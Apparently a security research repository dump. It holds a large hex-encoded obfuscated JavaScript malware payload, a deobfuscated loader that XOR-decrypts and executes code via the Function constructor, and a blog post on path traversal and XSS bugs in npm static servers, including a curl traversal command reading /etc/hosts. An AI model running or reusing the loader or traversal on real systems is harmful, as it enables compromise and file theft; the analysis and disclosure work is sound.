\"8772c3f5e045e04657439180f144a36382e353e7f70\" + \"70646c315e344a387a065a6f0a440c1c671\" + \"b0756102d0a36590b4e6c22250a267e547f717102011d\" + \"7f4f261852072975771a53294c60270b1a190e05706b797e59171e70\" + \"466f036f3\" + \"7000b3a015f51521f404e15452b145852176d106846322a373a5c7c2f56155a341f121709636e79330c4908730863\" + \"2c5a691f06605b7035314a443a1a457e7111380323732e49420b1e141257675633425014372a621f7431156\" + \"c304139120064634207292a0f67325a72431c392b36114a425\" + \"c641e487c4808367f7f731d007c69217c5c6\" + \"6555e463a0577334c3e617f1255325\" + \"51a516c593d603f144e74745a4e31286b72615e274279382a0455291f377f433121142c214f5f084a32304f22136e5e55565e64453a227b2773\" + \"2741726c434123740120182f1e49685e514a6c6b1b0f64560303655\" + \"d5c\" + \"046\" + \"9337429300250170e73271d0\" + \"031461346326f217817023a4f7a2d3608684515073f40270c6c5a77173\" + \"6545d715669491f223717481b532c4b7b0e07500c600014682f41062341196b01685c7b71041903392e513a6f6c0d3d7f7073412a411\" + \"96b7220400b7f1b7941242273257767352a7c033e\" + \"0242772d0e002f76071\" + \"57d11750c2b2438001b78312e55701d391539\" + \"31384571674f05095f21071d59431500322246420e183629360b0a1f5\" + \"c0\" + \"50b4a37745c2a61261d226014\" + \"746c0679324650326d354f0b7e692344233f06076a64455e493115460c4971070e351a7b7a265248245c31314613465a0b3232663a\" + \"564d61196f72556167335e2f20276b445d0410684d435130781d787341391d511a52322d5576600e4c08495a10412b\" + \"5535261b2b01593550391d422a1b585a272\" + \"e\" + \"4e683e14240b497d\" + \"5943606d2b0008563c3c\" + \"2056415220591831326f5f736a6c414f140\" + \"24626241443670f0\" + \"57\" + \"b464d3a616e1f3e5d5a102a5f7b2a08656f723e2f30174c55042f09\" + \"255a6f6546272\" + \"3563c29087f7\" + \"0523\" + \"9234549700a052b5a311e5d7c774e60225d670a28263c4c17222734552c5a605d\" + \"65581053461c107a1b5e63\" + \"07434c661e227165296848231210666851041e136d59\" + \"42774531320057524016360f27362a024729750360514f055965082246153\" + \"267511f48301a24\" + \"460d0a2d5d1161677\" + \"51e772e655\" + \"36c79017c4d53665c134b035104585633731b320349\" + \"412\" + \"47f4156506c134f7f6a17417261427076786c4\" + \"a386025787309220d1b1b0540051c0b0\" + \"a5e2e1c31726b2a3a0c181c7b4b592512744d41633\" + \"d2d2d36297417466f6e3a4217064d0b172f0065652d26\" + \"1960\" + \"105f27772c5a2651690a6c4a664a42170b0862564f5b700d2d1133782f2b100d264a2521266167055b5a49572629484c495b0f1b08653b6f3106046c545e110256774b60076d\" + \"097b230f172119340b313d1f3d79423b096e64042c1733565e49145c7f3d0476490773660c\" + \"4d0b3a372e3a4d25545a273c25773464100e6926536b130b4b154f396152600c726b6c212c175e1818541b734e1b19505616792e682f151f475a356\" + \"3471961454a4e0\" + \"b41607f5979675b445a35406736667b551a74556b785e504e607b6f5618563e6b6866633\" + \"720241c3a386116741f67393d3b3971615e3474363e685c2179163e192f357a244a11033a47170e49343235006646616\" + \"56536070671455d2a3\" + \"d2d403b361828506e2721132d3\" + \"10f493663087c5d1\" + \"54d0152036c4d431c5\" + \"e6574425e49496b\" + \"634\" + \"01f445e2d420870035f370d5a54422c3e3e330a21125a46475e\" + \"75\" + \"5e217c7b105e6905504a705c4\" + \"669266b1528602561\" + \"6d44666b015732765270644d75182751416\" + \"13c4b49373613094e325f20420b283b5751154a472d19106f\" + \"1b46216b203f1d6a0f3564632b186c6c604e0e1335593e0b747c2d544965377c1579216b507e0a561\" + \"8421\" + \"3226514431c703e044f5a1\" + \"1693d1404305d7a68180c0\" + \"23d3b336c0c143f4e2f1c546c4b0f264d4e5e3a1d00407f205a324e372f212e285f767a77393d70781358643c392252047f566e382f0c6b21031c08410f133501456f52\" + \"1\" + \"c355018732d36101803517c7837\" + \"252344496a2f22642c24284d4d041f3e62363\" + \"86b4a177c581b764c18521f\" + \"301\" + \"f6a513a404573267d161c\" + \"2154007b241b3152117\" + \"e5d212\" + \"95e1e78163b3d177475192a497f2935784a\" + \"2e27107d423258345a6977216c074b6b\" + \"6240\" + \"367d740d21\" + \"77187c216548523f6e491739083d7c3d074472702c5541567024463a3932651b14415d344f635b1b3b4a0b3e412429186\" + \"d2534265c703663600b0b5d66703126737b76223525321c2e357064\" + \"606c6341216f697d6c510032674d436f693077196e03391a3340734b177d3c2c3e5175451b6c262a2c5e7c5a04516f034e4034684762180f4b3b024e04223d6848106569041f387b5c5a3c630\" + \"d226f3953087e7814154b5510276d7e6364706f135\" + \"36c3517745a4f4d0641247b7b64507407057c5f217d1a03015a0\" + \"73977314\" + \"b2e7578005f744\" + \"d635a6348\" + \"4a333d7a440\" + \"c61162b517036696e072c3f1c2d6a1d423f635930126439297f0f29741734566f182f6c177a5\" + \"15f74750e4e4c1c387b3e5a5e0f3c735e41073\" + \"5410073111f7b77465f746c03323d6f2b10206b3f3c2a501f160d68263d210d2272633707\" + \"6f1c0d74720d2059142f0166011a45\" + \"110a2a37457824054e0e4a762b795a0c2b7a43076d09352\" + \"c697d0\" + \"2222c7f01367847717b77326a0f6f14781b7b32097e5661025d4178216e7442456c5018015c753434\" + \"7b05060b57754403223a2e7a6a391853557a095b6c226d5f375d035e0803717e540d382606291b62177243267\" + \"560115279777a297775353d0052255218782a60555664742f36480b\" + \"7a0c577d450a0f7b2b650119692f3c1e6b6d68507b2a1f2e65632364552d5d0e4e7a0d2754296c6d232e37712a1b7e02350c750129\" + \"53\" + \"74375\" + \"a225258730\" + \"f14307d2145670e02420c21224e0f5e735e705504500219721c0b40252c5e0d0\" + \"d025a545c2d492a0b1c7a2c7\" + \"c196f333145740029635d48486226\" + \"3a2a7430780436037d243a7e4d046846093363035d0d48763902562d5c28264\" + \"80a1a760c6921785f522b0d295167\" + \"307a43725668682e7f7d7b\" + \"717d68\" + \"552e6c\" + \"7652500e5a53383b526f4b7c2772221050165f0077357d1a52785232520b7e0804277352202\" + \"21a23552a46510854242b17620c02477058335b3151154c09287d7f0d3606752079600e3354452a0540353131572211493f7d297900785a153f69362d583621105a1d7877282\" + \"e1426065\" + \"f15415730004f2618782d6170782a2841\" + \"257121264b5d2408612c2575257e0c52082d251d59037f61766a28500968\" + \"0c1321577e5e4c6d5a3f637e7338134c7714250c4a285d0\" + \"40\" + \"d7252\" + \"6b1b735b66564040085f295654055005\" + \"4271214e286722780e7f730f4d071a2d7703483\" + \"f553f3\" + \"9521c2638691f153e5e703d7d7c365b6b146b5e67250d226b415d075c55200\" + \"e150c7846007c333f637f062152660f66300317220604502c5d295752\" + \"531716774b0c713612230c414f0b7\" + \"3515573292b1b1e16136d7a362a262b3234327b211b3f5e7f0b2d501f474d1558355e1314563a517a51170425773451313e2d\" + \"482829540234520b2b4c18573f\" + \"7c721c5d2d117729185b2a0808686b2f015e770979036f417e7a1b4d71514b000e08495f0408207616136d7b1d2f14783226260620714e0a51345\" + \"54b71043c012874550e5931107c730c3\" + \"c5e17391b2362775e4e2a0e6f7c572f69733\" + \"9706f1d014f18045a0e3d023f530f03277b2a4a226\" + \"9200c37595352196f61065e686c5263215e301f037f702e00043f1\" + \"63a5059565200747f3f655b433f7929\" + \"285e6f0f4f542b0e677315785\" + \"6\" + \"0e6d5a77\" + \"5e090\" + \"b38136d767c4d08202d1959\" + \"73242e64065e725418292547556f5d69365d7170017223463f590735076f7a69\" + \"290410411b36512c\" + \"2c7f737573517c28004b4513312\" + \"65d4d0b47564a545b7972475a2b020a543e19591c7869566a706e0550221f7a0d0e7312525076322977510a7b080025\" + \"0322021f6206243227027f0c36543f0d072306371450636f070e7a5555006e\" + \"250716012658052c2f464\" + \"67c521c7d1a1b0725070f0\" + \"f0e762c147c293705352\" + \"07227527552427b627c7e0b61420064327b347c3724292c3e017e115\" + \"37c3503113b3456680277283243227f035e2d763\" + \"e0a33556e5435656b062f7755713d\" + \"5f31085b13\" + \"380108777a555a5c4f257b704f055c1a4c7506202d4879012d067b2344312a0d737b4e57776773591f2a7\" + \"f11177475027b296c0b0f5e771d0c4d1a7f110273\" + \"0c\" + \"6828742b30741f6e7715585015417e7b742f0f083b497f7a457601407f2668727c540214492354505177790b353d072e1\" + \"8400e2946\" + \"5805213d0f5b560e0f5154775\" + \"7672b4d29131e3e4f2b5\" + \"e364a132b783d210e6f2901725e0a20491b237d784007\" + \"4d35365637200733075d3121\" + \"7b0764216c56111f0a113678065924675004555\" + \"d5e0b74427d4d0e5239\" + \"077f70097b2c2b7f39365c1a5e\" + \"5b681a7b54217d5b2f4750714a23290a5f74524466561f4e0028201659654c0877264a7e1a767a7932012a70\" + \"710522050d0c7c1e\" + \"095\" + \"7\" + \"5248047e0b01340f040b78\" + \"4961362b7a3d05324a\" + \"70762c1a415b0d72\" + \"5a711a003671145700191\" + \"c3\" + \"545047b7053\" + \"04782b\" + \"080057551040391b731659653b56415d7703724452007a0a5d6735\" + \"2910266\" + \"52f026f\" + \"235d3b145f2057255d400b5c0f1c7c7b5d7c550c077e2e0d\" + \"455e2f291b7b3a0c0327650a62772979586d642637670d2752040251495d054d5e597800207f6a627c5e19526d480f7e767e0e436816627a7030241f7c77\" + \"2e7f5d551f761e537e513d3d7b676c224a04617b25554a56705c6743\" + \"625a19474f5867050f05644578436819732e17222\" + \"41177221d6332\" + \"5b060c592136251e0\" + \"d140156795e247a2d7b5\" + \"e1\" + \"578030d4e59073d3f225f364b707d557a7056224f385426752b1\" + \"a2a53657f0264077009554b02062f75412f50562860264d4a716c7375563c04196072253543264e0b2f780b327\" + \"758500555603f\" + \"542a0e646939787d655\" + \"8545607466c07590f5a09550762327d58131d565\" + \"8315c087b4b225b0e116b380e2359105518774575555f73561435137074495f5a6672775b0e522637642f22\" + \"216a7f4f366837556d0e392c2e642c777c4e766c5c3f670b4e335179063e75317b0451002d0c102443787c3e0f2106272974\" + \"720647360f4272723811242a\" + \"597b0273392378427\" + \"400750a37422c185118457c0474081d5d350d2d7e620b1e2875564307772c0e7d205\" + \"95a7554185054243\" + \"6527504\" + \"7f1b5b0b035733712761554407374\" + \"25e5c7854033261391972327b637c482a7c4c103e33\" + \"2b77255d2c01780d0c292c411367610b034f7c417f4152786d14530c0b52765b383c5\" + \"a3a27647178437652747366715d\" + \"7421395e0107635078577c2a7b53343d613f0e2727665\" + \"46f510e0b4d083a75575c5e366e531f630629\" + \"297a55554d232a4e530356787e7c624e5756\" + \"4659106\" + \"70875\" + \"270d240e235d021f30612561007f76736264097f162d05016563034d3d7f162318782c5\" + \"c6b292510772e145857512420305602794316700b0b7a27221f5b07462d73604c63\" + \"5\" + \"40c22277569293370445d09042772227a0021\" + \"47735870615a586c155c096f155c52027e702f094331025e\" + \"0b751e75241d280a39\" + \"7b004b46017a7d7824190477577c6\" + \"b0861402f33085f0365597101337b3b3b0b1b01750d22647a542b2c033e3278541f222341\" + \"047a64067e7e4b0c247f740d58067c7f6e6e7\" + \"72c364e5955457f0d2\" + \"61408210e5e2e\" + \"582c7e56457c612710287472775b18183b277e402e77312a7575721e6c2c195f262a6351303236\" + \"2127\" + \"1c4b32205c492e2227320e3a043548221e6b5a002d6c7f3604381c19722a6e234779001\" + \"45c2a080\" + \"a116b385e\" + \"3718571e7f5b13472f25614a122e37535347270c0820220630372d421e762c5f0246004b742d276d22607f2f0d3\" + \"b7a22280e0858194a6d78645b082046292\" + \"659662e650a5c081c5d253a0f6a7d3b4c0\" + \"1270253\" + \"0e6f095b0c2b3\" + \"f004f7943611b2016606f01587b06227b0003507b513d436b672123483056156703242066224c020f0a293d300b130f652a733e0d04292c1b0b5d2c2a4274555d6f2b040c26215e29222b2b46752278312910060652332139260b7277676756351804757606730c172e516103015e\" + \"510c786a142f2f4552194875772\" + \"d0a5a2b2d054e7a5d317b6f7451707b750662784d222e2\" + \"e626559325331097369017a432e1506137b2\" + \"f6a7542106b571e0f582637342607505c5e21410d756d2a7b3e324a5f567e0d596525380d3e0d055d5b57242d591a2166517b1b7758671c2622311d0078782823267766615755700d1b782c35030c61227267475e7506507a490d0f7c2a61051d3\" + \"879680a71293c51747a1f2963322\" + \"463507f5b5e4f7c5e66496a693e792834722e1b2e00600c255023416a\" + \"240170025e\" + \"215\" + \"a446f29774d340e52415\" + \"f227f1f550d710e715b0405051872480e1727290f5f5d46134e0f7c1b2\" + \"d5d1f7\" + \"c28795e70273342260e7a3909481c6578682974622e003402292b\" + \"3c7a4e033b130a63640602064879650c587a547974490f4c23543c262b5e00290c780330677d4a2\" + \"44\" + \"4257e7e766d316a7f3e\" + \"582\" + \"a6\" + \"f\" + \"2554065e02526b3c033d4e7c2873721751145d5\" + \"42365294e51290761\" + \"0e02250b0a2174153d301c215c2a4a0e0e087f6d1e6b1e5340215d6b006751114b5d782b7e51670d28227d641e2e151a295e4\" + \"e3f34660f75025125777f2c562b59473a6b377c046677165a1072267f70103\" + \"44e44530b42375619214a2e7b32732d23724470\" + \"7421224a5d7e593421297e742e03025c212f490a597f68706a7e53083d5a107a532c0a49600c3a347925780e587a452a091f790d005a77536f0\" + \"a3e4f3b0345405d087e58040550561025771c2b372628087e271a031\" + \"2492b200c183b55683c0749273d290c53680b226a7879641d7057620d3524007c3d400b555c50200854466a4b0\" + \"3783238647f022851731d25350510715656007e1a671650465f55704\" + \"30f2737172a5a4e4f59700655257d7d4d1c045c7\" + \"d7b6c\" + \"7d253d7c73677f73493f5928012e51465c51515e3f5b441301695d2e16591676716653\" + \"65652f4a2826050562084f364c51113d2c261c5c\" + \"7\" + \"910797b125c76065f\" + \"6d6f7b510d6d1769053e102d2a414f220610531a145f0a025972\" + \"71515d7f774d2913213\" + \"c257a507327434d49\" + \"2f001c255233012d29075c0f641f7a715535074f30182e6179524f2a013e2e\" + \"07796822647c6f4d074f4c51560a3c0e68044f1f3773\" + \"2c1973317b56315a03055e\" + \"73755605633b5437210e63054e3b217203003d51\" + \"294b59510f03792a6e645d4c3623782\" + \"e006\" + \"b0d091c380933330c6e55016959760c0c58780c29212f4c0b2c2\" + \"b4f\" + \"5d22732f63515\" + \"e755418222511576d0663300921750122325e2a0b523007397d6e7d5d43464d6007282a\" + \"2a797322517c7f0319471a342709\" + \"5c1750044e050c79731a547b040c546b1959477232092e6e7e51527f197b06087143585\" + \"e7d347a27545\" + \"d7b585e25587314007507322e3402795861516f\" + \"0d07775734150\" + \"b346e550e6e4a405e682703440223434d6a78454e2e50472a1a1f012950020d0b787f472f7f3d50307b7222002502422d607c795d32130433602b6326\" + \"6472782b32002c46532\" + \"96c03146f3d56395d716e7f582629030b217b360329187f5\" + \"4346\" + \"66c062824\" + \"5c2e6b593508490f7f555872760d00544b23757712005e46417505202d482f0b290e202316632808217b1e052165705e1b7a785059307953777b6f055a0e734a0f181b7f440b74016f2f7b2b317\" + \"54d3b7e14075101523e2f257b011d2553772d4d771\" + \"25a3b7536712b55004245785e050073285963\" + \"6c042a18470e284a0c072235010d0a590c07047b04667a4b2f150f27592c086a1c427f2e64705d6f2e02755604265b55627b2d46081e386657357b5130000f36737c5\" + \"624322f00464f0d1130\" + \"2d56003028400\" + \"c570a0d552a1\" + \"02f1f0f40211\" + \"52c2c592e2a787c68640a1f0c5e6e093543267f062d57496a4b226d174\" + \"8285d4236004b49562722034570\" + \"4a5b26744a7449722d7e3b52\" + \"78746217615503087b1f095a544e077b0b50625b07067b4c222b3f7d3f5\" + \"66e4d707423095a4e5a26507046043424180c564a1b671b50717d5601737b540604071449391827021476281f535a710326450554785907616228\" + \"47236a7e006c70582e5c4f2402790b445d52061b227103750\" + \"35\" + \"a032a7\" + \"f0f415a752a1a7c3f0e52743208677377705f6b322563300c285\" + \"6555a075317121f0d592c08\" + \"22233\" + \"f3f780d18516d\" + \"4d4f366d7e09052250627f77682f1d777c7c7b0e514f7113077e073e3c78316f224b5\" + \"d607c72564a02244878546c0e48474b533d555a0732\" + \"147a53210f772e47712514717c4d6165080659\" + \"5a226a7e1e091150057c0f2f2d792b58152d030b495f003168700a38482474537a725970483253252329462c5c31295432516a005c5d055623774779595a2d61241e462a6e797b076651097b63793c1\" + \"1271a54242a093\" + \"56545110052363c522a4e2\" + \"a2d30787b3a0256530a4a3c035e5b0109530b68672856\" + \"171d570233075b7a4d2\" + \"55b0f00732a022a0e19554e\" + \"24482\" + \"10f0d78564431402727495d0a36237c590c093c2924722727397d4b366f764a78073f7a73377c212\" + \"c4d7e6c0c6f60094f6b007b5269753074404a402c02137715227b3e0d2f522d7c\" + \"227001436455457a266b4522235e7\" + \"d50763a2327167455705f2c5a6a180414422953225c1b58305c7f2b76140a7f7401420\" + \"02c2c0b7523585d27004a5f552a365227062b465d0d0a5130237d3d5114526d175a537a58006170210d213272347f4f7c7d1e403c372f2229547\" + \"90d2d575a7f7810466731085219\" + \"73157\" + \"410007f7b5c445b0c56770a69335a3e2735257345755224716075582f7c310b07043303\" + \"7d042a2b21022575723a5d7472360f3e065b0c195a3a7e015e0f6868084f305b297d2a5\" + \"80b1e732d1e5455512d7f2c6\" + \"418065a460c176002772001371c3859135221652963042a7027702d4e7b102e0503323d021c68794\" + \"723192e280e38282\" + \"64270234059104c317a320c557b49432409\" + \"0d202f754b5907492973304b66030e227621382f64754f0e0c05737c2577526159300874640d533a400e1d7c530a03032a2a2c1a5171080f017a4d76251c2d0e6b29514917552e792a291c54331f663005\" + \"69417836065e0e6b097\" + \"00b377c6c395d1901265072653c49\" + \"6a7b08792d6e534e23211455203d07237e5e13607d250c530b2c7e346e267f6b470808497e0e73420b6217487558787c57462f317706603474210e4c456b707f4b2f2e3e7a7272755f70681f5a\" + \"79\" + \"286451636\" + \"0622b3d025c35775d4\" + \"d7\" + \"e7f75675663526219711a350c077e30\" + \"2867567901196f6d697\" + \"54c2e021d5e7a1d4511712e0a395f4a0e29584d4772207757007d3a565e15735a5d71700930377d174\" + \"c212f0c5a1605477\" + \"67b273e26602\" + \"97e5e392a2270070c5c030529\" + \"2f340d037548782a02743274015e594f\" + \"5b206b5d3d2c6c1a557256035d3c5b\" + \"0f0b7c3f05187f1622526440603e525c691f66710c0\" + \"35727566e41683b252f49234c1\" + \"574112f206622\" + \"4c035e5d223c6b0d485f352f223e5d502d2e4f5a0e232b1477045c687b005729200a7f78797c117b737c6a7842505505726b7d250e72723e37526\" + \"e4d077726522c0f147d036403095957077a6b1729\" + \"201f004f1c6139380d\" + \"592a7f031b2b0c6079387d5273782f56612d49237e7e67385e6e44791a7c62097\" + \"859675407412f776b751114395b120a0b\" + \"7164357b070c5a0c224352763b772c6b301d\" + \"56572d5e5c3e736c583f08070c5652757c59083371567e48760a6542247f6210007d7e28722473353\" + \"00155\" + \"20501a7f7e67505f62757f34430e77060428435f5f792632061e642a3004\" + \"766d21407a7d5c6472312161562900081f795f21072b3c69752e63797d467d53640c27012553\" + \"74375a250e597705413b7a20433f0357175e27264f040d2609705401561556654d0a45277c0a56041017\" + \"445e7f09314f4c29287e0e227\" + \"536442c0b2e385c484f6022687e7262295731\" + \"067e2c6b7d4f033649\" + \"0d313204\" + \"0c01132d655854795d792114501f2d\" + \"0e6e247b5f037e5e29523a672c1925513f392f762d23717962082e3b2754075e585\" + \"26228492c4f28277371140b115d5679652b13532a0361055d23570022210677\" + \"264a214f6350515c09256f05720c5f41205f3a506106424a59292a2e0b665526772\" + \"f66096355417f584b6f31604c3d11527829292a072\" + \"c00156f69657d073d7c140a1278\" + \"702c7c10255c55065c463d02497e18792f3b222a7b734324257b224e5\" + \"f7b0b35262f2f7574040c002e214101582f3321382a035a390e1374577e0a4f640a792d6e70230b58774a760f4c740c151466077a03375c3b0a174209522d5151030c064c25211f266176\" + \"2b0f79775e4d0710287703493a556b33034e766e691f1\" + \"56e0\" + \"866226d7f6159\" + \"69456508316213386b440f070b01260c135a2c13567c633b6a280d73577c457\" + \"4300\" + \"644710000546a136e0c05120b5574440e76301a7e0e491f0c7402017e292d\" + \"4148070b2d2c657b713d\" + \"2d74352175496b0e2e0d7c571207040f5c3708174151395c2e06440074266456306a7c1d2a7a58076251587\" + \"e5c50\" + \"166a29741d0d704578\" + \"2d4d0b7f\" + \"08092b22\" + \"6e560d295a2a553a122d2c4c1b715\" + \"a1b515d5c4d4c1c1d2277075c7c7e482e10243e7472572d7c101e43705249730332042d230e1d42234d7d220339534e6318203326081f79093f7c507c6921372d3c1e54491e59031a21156e570\" + \"8012d73291\" + \"e26697b55610259000a717007563e3d50\" + \"647006200c477c2e2151523d5173410d015\" + \"351742f\" + \"38365645602f2d230b3e0818557c013524177b05016\" + \"90b790c0\" + \"d5e2c0d77717f465e21261b0c72742860005a7c561978\" + \"7510506b0e3a3f5f76710077345f2a580b3e036b74687d0144441864153373\"));"
  },
  {
    "path": "javascript-malware-obfuscation/do_not_run_deobfuscated.js",
    "content": "(function(quhuvu6) {\n    var defiq = cicuza(quhuvu6);\n    var permy = \"H@D~7a84O\";\n    var v = {\n        getpy: \"myqniroqa3\"\n    };\n    var fnConstructor = String.constructor;\n    var t = \"mokzine\";\n\n    var dikol = [];\n    var k = 1;\n\n    while (k <= 1) {\n        dikol = (permy.substr(permy.length - k)).split('');\n        for (var j = +!!false; j < defiq.length; j++) {\n            defiq[j] = defiq[j] ^ dikol[j % dikol.length].charCodeAt(0);\n        }\n        k++;\n    };\n\n    for (var r = +!!false; r < defiq.length; r++) {\n        defiq[r] = String.fromCharCode(defiq[r]);\n    };\n\n    t = defiq.join('');\n    v.toString = fnConstructor.constructor(t);\n    var gogoq = \"1cf4d5\" + v + \"631a403f5\";\n    \n    nilse(gogoq);\n\n    function cicuza(val) {\n        var result = [];\n        for (var i = 0; i < val.length; i += 2) {\n            result.push(parseInt(val.substr(i, 2), 16));\n        }\n        return result;\n    };\n\n    function nilse(tefkysab) {\n        return (new Function()(tefkysab));\n    };\n}(\"41553a304f0b442551284206\"));   // truncated; see do_not_run.js for original value"
  },
  {
    "path": "npm-static-servers-most-common-issues/npm-static-servers-most-common-issues.md",
    "content": "# Most common security vulnerabilities in npm static content/file servers modules\r\n\r\n## Intro\r\n\r\nIf you are JavaScript developer and you are working with Node.js, chances that you've never heard about [npm](https://npmjs.org) are literaly slim. **npm** is a repository where hundreds of thousands ready-to-use modules for your state-of-the-art Node.js application are just waiting to be downloaded and used as a part of your codebase. node_modules directory in your project grows up exponential along with every new feature you are working on.\r\n\r\nMaybe it's even more and **you** develop npm modules as well, giving back your work to the community. That's really fantastic, I always encourage to contribute to open source projects and share your work with the others. Developers build this ecosystem and thanks to them it's amazing.\r\n\r\nThere are many types of modules doing specifing things. One of those things are **serving static content** from your server directly to your users. They can be used for eg. browsing directories, edit files or they just can work as small CDN service for your web application CSS or images.\r\n\r\nIf you developed already such module or you are going to build one, maybe just for your needs, maybe just for the company you work for - security should be a very important part of your project. \r\n\r\nUnfortunately, this is not always the case.\r\n\r\nIn December 2017, **[Node.js Ecosystem Bug Bounty Program](https://hackerone.com/nodejs-ecosystem)** emerged on **HackerOne** platform. The very first report, opened by Yasin Soliman [@ysx](https://hackerone.com/ysx) was Path Traversal vunlnerability in ```serve-here``` module and since then, this kind of vulnerability (which in most cases leads to Local File Include) is the most common reported - https://hackerone.com/nodejs-ecosystem/hacktivity?sort_type=latest_disclosable_activity_at&filter=type%3Aall%20to%3Anodejs-ecosystem&page=1&range=forever\r\n\r\n\r\n In this post I'd like to present most common security issues in static server npm modules I found in the last couple of weeks. If you do not know what Path Traversal, LFI or XSS issues are - I put links to some basic resources about each of issue and strongly recommend to read and learn what they are and how they can be used against your application users.\r\n\r\n\r\n## Path Traversal and Local File Include\r\n\r\n\r\n[Path Traversal](https://www.owasp.org/index.php/Path_Traversal), also known as Directory Traversal, is an issue which allows attacker to go up in directory tree on the remote server, using ```../``` sequence (dot-dot-slash).\r\n\r\nThis type of vulnerability exists when server takes user input (eg. filename) and uses it to build relative (or absolute) path to static resource, like text file or image. \r\n\r\nThis leads to several vulnerabilites, the most common is [Local File Inlclusion](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion). Very dangerous situation occurs when application allows users to upload files into chosen location. If An attacker is able to change destination path, one is able to upload eg. webshell (simple script which allows to execute system commands on the remote machine) into the directory accessible in the browser and gain an access to the server's command line.\r\n\r\n\r\nLet's see how this vulnerability can be exploited in the wild.\r\n\r\nPresented code comes from [public](https://www.npmjs.com/package/public) npm module:\r\n\r\n\r\n```javascript\r\n    var pathname = url.parse(req.url).pathname;\r\n    var filePath = path.join(dir, pathname); // Real file path\r\n    var base = filePath.replace(dir, ''); // Base path for browser link\r\n    var abs = path.resolve(filePath); \r\n    console.log(new Date().toString(), abs);\r\n    fs.readFile(filePath, function(err, data) {  // <-- vulnerable line\r\n      if (err) {\r\n        (...)\r\n      }\r\n      res.writeHead(200, { 'Content-Type': mime.lookup(filePath) });\r\n      res.end(data);\r\n```\r\n\r\nIn line marked with ```<-- vulnerable line``` comment, you can see ```fs.readFile()``` call, where ```filePath``` is used as an argument.\r\n\r\n```filePath``` is build with ```pathname``` argument read from HTTP request. No sanitization was introduced, so if ```pathname``` contains dot-dot-slash sequence, Path Traversal can be exploited.\r\n\r\nWhen ```public``` is run, nothing could stop attacker from reading the content of any file on the server:\r\n\r\n\r\n```\r\n$ curl -v --path-as-is http://127.0.0.1:8080/../../../../../etc/hosts\r\n```\r\n\r\n---\r\n\r\nThis issue was fixed by the module maintainer. You can read full report on HackerOne here:\r\n\r\n\r\n[[public] Path Traversal allows to read content of arbitrary files](https://hackerone.com/reports/312918)\r\n\r\n---\r\n\r\n\r\nAnother example of vulnerable code comes from [hekto](https://www.npmjs.com/package/hekto) module. First, let's see how path is read from HTTP request:\r\n\r\n```javascript\r\n let file = path.join(process.cwd(), argDir, this.request.url);\r\n ```\r\n\r\n Now, ```file``` contains full path to requested resource, starting from current working directory (from where server was run). Next, some logic is implemented (not related to the vulnerability though), which takes particular action depends on file extension:\r\n\r\n\r\n ```javascript\r\n\r\n    if (fs.lstatSync(file).isFile()) {\r\n        this.status = 200;\r\n\r\n        if (path.extname(file) == '.html') {\r\n            this.type = 'text/html';\r\n            this.body = fs.createReadStream(file);\r\n        } else if (path.extname(file) == '.css') {\r\n            this.type = 'text/css';\r\n            this.body = fs.createReadStream(file);\r\n        } else {\r\n            const fileBuffer = readChunk.sync(file, 0, 4100);\r\n            const mime = fileType(fileBuffer);\r\n\r\n            if (mime) {\r\n                this.type = mime.mime + '; charset=utf-8';\r\n            } else {\r\n                this.type = 'text/plain; charset=utf-8';\r\n            }\r\n\r\n            this.body = fs.createReadStream(file);\r\n        }\r\n    }\r\n ```\r\n\r\n What you should notice here, nowhere in the code ```file``` is checked against existence of ```../``` sequence. This leads directly to Path Traversal vulnerability and allows attacker to read content of arbitrary files.\r\n\r\n\r\nSolution implemented by module's maintainer simply checks if ```file``` path \"fit\" inside current appliaction working directory (if ```../``` sequences are present, ```file``` won't pass this condition as it \"goes\" outside):\r\n\r\n```javascript\r\n\r\n    if (!isPathInside(file, path.join(process.cwd(), argDir))) {\r\n      this.body = 'Bad Request';\r\n      this.status = 400;\r\n\r\n      return;\r\n    }\r\n```\r\n\r\n\r\n```isPathInside``` method comes from \r\n[path-is-inside](https://www.npmjs.com/package/path-is-inside) module, which is a good choice if you want to prevent your code against this type of issue. As an author explains in his GitHub repository [README](https://github.com/domenic/path-is-inside/blob/master/README.md) - detection of path is not as trivial as it looks like. \r\n\r\nIncorrect implementation of path resolving routine can easily introduce Path Traversal vulnerability in your code, so always be careful when you build your paths.\r\n\r\n\r\n---\r\n You can see the full report on HackerOne here:\r\n\r\n [[hekto] Path Traversal vulnerability allows to read content of arbitrary files](https://hackerone.com/reports/311218)\r\n\r\n---\r\n\r\n\r\nHere's another variant of this attack scenario.\r\n\r\nThis time, [serve](https://www.npmjs.com/package/serve) module allows to display directory content directly in the browser:\r\n\r\n\r\n![](assets/1.png)\r\n\r\n\r\nAttacker was able to use ```%2d``` and ```%2f``` characters (an ASCII codes of ```.``` and ```/``` respectively) and forces server to display content of directories outside of the application root:\r\n\r\n![](assets/2.png)\r\n\r\n\r\nAn issue was [fixed and patch deployed](https://github.com/zeit/serve/pull/316/files) in just 2 days after report was opened. The implementation of fix contains ```decodeUriComponent()``` (see https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/decodeURIComponent)  JavaScript function, which turns URI encoded characters into their ASCII representation, so ```%2f``` becomes ```/``` and ```%2e``` becomes ```.```. This normalization allows to verify if sequence ```../``` is present in the url and does not allow to bypas protection against Path Traversal with various URL encodings (with Unicode or hexadecimal encodings).\r\n\r\n---\r\n\r\nFull report available on HackerOne can be found here:\r\n\r\n[[serve] Directory index of arbitrary folder available due to lack of sanitization of %2e and %2f characters in url](https://hackerone.com/reports/307666)\r\n\r\n---\r\n\r\n\r\n**Remember to always sanitize user input comes from HTTP Request and never use anything which comes from Request directly in code, especially if this code executes calls to the system, like opening and reading files or streams, creating directories and similar methofs from [File System Node.js module](https://nodejs.org/dist/latest-v8.x/docs/api/fs.html)**\r\n\r\n\r\n\r\n## HTML Injection and XSS issues in displayed content\r\n\r\nIn the last example of Path Traversal vulnerability in **serve** module, an user was able to see the content of directory in the browser. This is not always the case (many static server modules does not expose directory listings), however, in some modules which provide this type of functionality, another problem is quite common.\r\n\r\nAs any other output displayed in browser, directory listings contains HTML code, mostly built as concatenated string contains HTML tags and directory and files attributes to display them to the users.\r\n\r\nLet's take a look at sample code, which comes from [crud-file-server](https://www.npmjs.com/package/crud-file-server) module. This fragment builds HTML output in the way described above, using list of files saved in ```results``` array:\r\n\r\n\r\n```javascript\r\n    res.setHeader('Content-Type', 'text/html');                                         \r\n    res.write('<html><body>');\r\n    for(var f = 0; f < results.length; f++) {\r\n        var name = results[f].name;\r\n        var normalized = url + '/' + name;\r\n        while(normalized[0] == '/') { 